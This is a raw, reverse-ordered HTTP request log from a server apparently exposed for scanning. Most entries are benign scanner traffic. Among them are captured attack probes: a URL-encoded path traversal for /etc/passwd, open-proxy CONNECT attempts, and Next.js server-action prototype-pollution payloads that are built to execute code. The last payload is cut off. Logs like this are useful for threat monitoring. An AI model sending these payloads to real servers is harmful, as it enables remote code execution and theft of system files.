User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.187.35.142:52794
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-04-07 22:26:29] === HTTP Request ===
[2026-04-07 22:01:06] Main page accessed - IP: 198.235.24.25:57772
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.25:57772
Path: /
URL: /
Method: GET
[2026-04-07 22:01:06] === HTTP Request ===
===================
Referer: http://95.143.191.38:8081/
Priority: u=0, i
Sec-Fetch-Dest: document
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 64.227.150.143:45438
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-07 21:07:45] === HTTP Request ===
[2026-04-07 21:07:44] Main page accessed - IP: 64.227.150.143:45434
===================
Sec-Fetch-Dest: document
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Priority: u=0, i
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Connection: keep-alive
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 64.227.150.143:45434
Path: /
URL: /
Method: GET
[2026-04-07 21:07:44] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.172.131:63948
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-07 20:53:13] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.172.131:63934
Path: *
URL: *
Method: PRI
[2026-04-07 20:53:13] === HTTP Request ===
[2026-04-07 20:53:12] Main page accessed - IP: 66.132.172.131:63918
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.172.131:63918
Path: /
URL: /
Method: GET
[2026-04-07 20:53:12] === HTTP Request ===
[2026-04-07 18:55:51] Main page accessed - IP: 198.235.24.91:51847
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.91:51847
Path: /
URL: /
Method: GET
[2026-04-07 18:55:51] === HTTP Request ===
[2026-04-07 18:34:05] Main page accessed - IP: 147.185.132.58:64594
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: finance.vulnberries.ru
RemoteAddr: 147.185.132.58:64594
Path: /
URL: /
Method: GET
[2026-04-07 18:34:05] === HTTP Request ===
[2026-04-07 18:05:35] Main page accessed - IP: 147.185.132.93:63912
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: _tls.vulnberries.ru
RemoteAddr: 147.185.132.93:63912
Path: /
URL: /
Method: GET
[2026-04-07 18:05:35] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.226:33572
Path: /config
URL: /config
Method: GET
[2026-04-07 17:34:23] === HTTP Request ===
[2026-04-07 17:28:04] Main page accessed - IP: 176.65.149.45:37594
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:37594
Path: /
URL: /
Method: GET
[2026-04-07 17:28:04] === HTTP Request ===
[2026-04-07 16:50:25] Main page accessed - IP: 198.235.24.132:59106
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: server.vulnberries.ru
RemoteAddr: 198.235.24.132:59106
Path: /
URL: /
Method: GET
[2026-04-07 16:50:25] === HTTP Request ===
[2026-04-07 16:23:31] Main page accessed - IP: 198.235.24.134:58022
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: meta.vulnberries.ru
RemoteAddr: 198.235.24.134:58022
Path: /
URL: /
Method: GET
[2026-04-07 16:23:31] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.143:43192
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-07 16:02:02] === HTTP Request ===
[2026-04-07 16:02:01] Main page accessed - IP: 85.142.100.143:43180
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.143:43180
Path: /
URL: /
Method: GET
[2026-04-07 16:02:01] === HTTP Request ===
[2026-04-07 16:01:14] Main page accessed - IP: 205.210.31.36:64444
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: s1.vulnberries.ru
RemoteAddr: 205.210.31.36:64444
Path: /
URL: /
Method: GET
[2026-04-07 16:01:14] === HTTP Request ===
[2026-04-07 15:37:01] Main page accessed - IP: 198.235.24.9:60642
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: anzan.tech
RemoteAddr: 198.235.24.9:60642
Path: /
URL: /
Method: GET
[2026-04-07 15:37:01] === HTTP Request ===
[2026-04-07 15:26:14] Main page accessed - IP: 147.185.132.180:63854
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: www.vulnberries.ru
RemoteAddr: 147.185.132.180:63854
Path: /
URL: /
Method: GET
[2026-04-07 15:26:14] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 182.242.169.79:26484
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-07 15:21:11] === HTTP Request ===
[2026-04-07 15:21:09] Main page accessed - IP: 43.248.109.130:41744
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 43.248.109.130:41744
Path: /
URL: /
Method: GET
[2026-04-07 15:21:09] === HTTP Request ===
[2026-04-07 15:20:16] Main page accessed - IP: 222.176.200.188:59261
===================
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 222.176.200.188:59261
Path: /
URL: /
Method: GET
[2026-04-07 15:20:16] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:42698
Path: /jars
URL: /jars
Method: GET
[2026-04-07 14:55:04] === HTTP Request ===
===================
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate, br
Accept: text/plain,text/html,*/*
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.249.68.133
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51500
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-07 14:33:36] === HTTP Request ===
[2026-04-07 13:48:27] Main page accessed - IP: 198.235.24.79:61476
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: _smtp._tls.vulnberries.ru
RemoteAddr: 198.235.24.79:61476
Path: /
URL: /
Method: GET
[2026-04-07 13:48:27] === HTTP Request ===
[2026-04-07 12:36:37] Main page accessed - IP: 87.236.176.233:51969
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: plausible.ch.bakunin.me:8081
RemoteAddr: 87.236.176.233:51969
Path: /
URL: /
Method: GET
[2026-04-07 12:36:37] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.244.8
Via: 2.0 Caddy
Accept-Encoding: gzip, br, deflate
From: oai-searchbot(at)openai.com
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:43570
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-07 11:55:59] === HTTP Request ===
===================
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.215:54208
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-04-07 11:39:10] === HTTP Request ===
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:23314
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-04-07 10:59:31] === HTTP Request ===
[2026-04-07 10:35:02] Main page accessed - IP: 198.235.24.89:63052
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: s.vulnberries.ru
RemoteAddr: 198.235.24.89:63052
Path: /
URL: /
Method: GET
[2026-04-07 10:35:02] === HTTP Request ===
[2026-04-07 10:13:25] Main page accessed - IP: 205.210.31.110:62670
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: get.vulnberries.ru
RemoteAddr: 205.210.31.110:62670
Path: /
URL: /
Method: GET
[2026-04-07 10:13:25] === HTTP Request ===
[2026-04-07 10:04:01] Main page accessed - IP: 198.235.24.173:63152
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: _atproto.vulnberries.ru
RemoteAddr: 198.235.24.173:63152
Path: /
URL: /
Method: GET
[2026-04-07 10:04:01] === HTTP Request ===
[2026-04-07 09:31:17] Main page accessed - IP: 205.210.31.241:63514
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: asset.vulnberries.ru
RemoteAddr: 205.210.31.241:63514
Path: /
URL: /
Method: GET
[2026-04-07 09:31:17] === HTTP Request ===
[2026-04-07 09:22:09] Main page accessed - IP: 176.65.149.45:41958
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:41958
Path: /
URL: /
Method: GET
[2026-04-07 09:22:09] === HTTP Request ===
[2026-04-07 09:18:02] Main page accessed - IP: 34.14.59.22:33082
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.14.59.22:33082
Path: /
URL: /
Method: GET
[2026-04-07 09:18:02] === HTTP Request ===
[2026-04-07 07:42:15] Main page accessed - IP: 178.83.200.2:60000
===================
User-Agent: Mozilla/5.0 (Linux; Android 9; moto x4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 178.83.200.2:60000
Path: /
URL: /
Method: GET
[2026-04-07 07:42:15] === HTTP Request ===
===================
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:59544
Path: /jars
URL: /jars
Method: GET
[2026-04-07 07:29:36] === HTTP Request ===
[2026-04-07 06:22:57] Main page accessed - IP: 198.235.24.120:62732
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: images.vulnberries.ru
RemoteAddr: 198.235.24.120:62732
Path: /
URL: /
Method: GET
[2026-04-07 06:22:57] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
Pragma: no-cache
Connection: Keep-Alive
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 64.62.156.229:50005
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-04-07 05:46:54] === HTTP Request ===
[2026-04-07 05:46:48] Main page accessed - IP: 64.62.156.228:33639
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 64.62.156.228:33639
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-04-07 05:46:48] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.223:31461
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-07 05:46:09] === HTTP Request ===
[2026-04-07 05:45:09] Main page accessed - IP: 64.62.156.222:61194
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.222:61194
Path: /
URL: /
Method: GET
[2026-04-07 05:45:09] === HTTP Request ===
[2026-04-07 01:12:29] Main page accessed - IP: 209.38.70.156:42958
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 209.38.70.156:42958
Path: /
URL: /
Method: GET
[2026-04-07 01:12:29] === HTTP Request ===
[2026-04-07 00:49:41] Main page accessed - IP: 198.235.24.175:59010
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.175:59010
Path: /
URL: /
Method: GET
[2026-04-07 00:49:41] === HTTP Request ===
===================
Accept-Language: en US,en;q=0.9,sv;q=0.8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:8848
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-04-07 00:32:13] === HTTP Request ===
===================
Connection: close
User-Agent: fasthttp
Headers:
Protocol: HTTP/1.1
Host: yjesuwarehouse.vulnberries.ru:8081
RemoteAddr: 47.237.13.112:35082
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-04-07 00:19:46] === HTTP Request ===
===================
Connection: close
User-Agent: fasthttp
Headers:
Protocol: HTTP/1.1
Host: yjesuwarehouse.vulnberries.ru:8081
RemoteAddr: 47.237.13.112:35080
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-07 00:19:46] === HTTP Request ===
===================
User-Agent: fasthttp
Connection: close
Headers:
Protocol: HTTP/1.1
Host: yjesuwarehouse.vulnberries.ru:8081
RemoteAddr: 47.237.13.112:35078
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-07 00:19:46] === HTTP Request ===
[2026-04-07 00:19:46] Main page accessed - IP: 47.237.13.112:34818
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Connection: close
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: yjesuwarehouse.vulnberries.ru:8081
RemoteAddr: 47.237.13.112:34818
Path: /
URL: /
Method: GET
[2026-04-07 00:19:46] === HTTP Request ===
[2026-04-06 23:56:08] Main page accessed - IP: 205.210.31.70:52932
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 205.210.31.70:52932
Path: /
URL: /
Method: GET
[2026-04-06 23:56:08] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 37.187.71.75:47394
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-06 23:43:24] === HTTP Request ===
[2026-04-06 23:43:24] Main page accessed - IP: 85.217.140.28:39282
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.28:39282
Path: /
URL: /
Method: GET
[2026-04-06 23:43:24] === HTTP Request ===
[2026-04-06 23:07:19] Main page accessed - IP: 198.235.24.87:59438
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: img.vulnberries.ru
RemoteAddr: 198.235.24.87:59438
Path: /
URL: /
Method: GET
[2026-04-06 23:07:19] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Proxy-Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: www.google.com:443
RemoteAddr: 185.91.127.85:56410
Path:
URL: //www.google.com:443
Method: CONNECT
[2026-04-06 20:27:16] === HTTP Request ===
===================
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: www.google.com:443
RemoteAddr: 185.91.127.85:56438
Path:
URL: //www.google.com:443
Method: CONNECT
[2026-04-06 20:27:16] === HTTP Request ===
===================
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: www.google.com:443
RemoteAddr: 185.91.127.85:56284
Path:
URL: //www.google.com:443
Method: CONNECT
[2026-04-06 20:27:16] === HTTP Request ===
===================
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: www.google.com:443
RemoteAddr: 185.91.127.85:56396
Path:
URL: //www.google.com:443
Method: CONNECT
[2026-04-06 20:27:16] === HTTP Request ===
===================
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: www.google.com:443
RemoteAddr: 185.91.127.85:56368
Path:
URL: //www.google.com:443
Method: CONNECT
[2026-04-06 20:27:16] === HTTP Request ===
===================
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: www.google.com:443
RemoteAddr: 185.91.127.85:56358
Path:
URL: //www.google.com:443
Method: CONNECT
[2026-04-06 20:27:16] === HTTP Request ===
===================
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: www.google.com:443
RemoteAddr: 185.91.127.85:56290
Path:
URL: //www.google.com:443
Method: CONNECT
[2026-04-06 20:27:16] === HTTP Request ===
===================
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: www.google.com:443
RemoteAddr: 185.91.127.85:56366
Path:
URL: //www.google.com:443
Method: CONNECT
[2026-04-06 20:27:16] === HTTP Request ===
===================
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: www.google.com:443
RemoteAddr: 185.91.127.85:56344
Path:
URL: //www.google.com:443
Method: CONNECT
[2026-04-06 20:27:16] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.175.158
Via: 2.0 Caddy
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Openai-Host-Hash: 867116608
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:56246
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-06 19:11:52] === HTTP Request ===
===================
Proxy-Connection: close
Headers:
Protocol: HTTP/1.1
Host: www.example.com:443
RemoteAddr: 185.224.128.16:54682
Path:
URL: //www.example.com:443
Method: CONNECT
[2026-04-06 17:39:51] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.186.167:64824
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-06 16:40:01] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.186.167:64814
Path: *
URL: *
Method: PRI
[2026-04-06 16:39:59] === HTTP Request ===
[2026-04-06 16:39:57] Main page accessed - IP: 66.132.186.167:64808
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.186.167:64808
Path: /
URL: /
Method: GET
[2026-04-06 16:39:57] === HTTP Request ===
===================
------WebKitFormBoundaryx164324668401--
------WebKitFormBoundaryx164324668401
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx164324668401
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 29992+true+5478950;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx164324668401
X-Nextjs-Html-Request-Id: ilovepoop_164324668401
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx164324668401
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Connection: close
X-Nextjs-Request-Id: poop1234
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:52102
Path: /api/route
URL: /api/route
Method: POST
[2026-04-06 16:35:39] === HTTP Request ===
===================
------WebKitFormBoundaryx280464555071--
------WebKitFormBoundaryx280464555071
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx280464555071
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 83398+true+3362965;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx280464555071
X-Nextjs-Html-Request-Id: ilovepoop_280464555071
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx280464555071
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Next-Action: x
Connection: close
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:52100
Path: /app
URL: /app
Method: POST
[2026-04-06 16:35:38] === HTTP Request ===
===================
------WebKitFormBoundaryx45617145055--
------WebKitFormBoundaryx45617145055
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx45617145055
